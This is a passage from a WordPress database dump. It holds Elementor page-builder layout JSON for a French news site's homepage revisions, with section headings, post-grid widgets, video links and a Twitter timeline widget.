d\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2310,748,'_elementor_version','0.4'),(2311,749,'_elementor_edit_mode','builder'),(2312,749,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2313,749,'_elementor_version','0.4'),(2315,750,'_elementor_edit_mode','builder'),(2316,750,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"s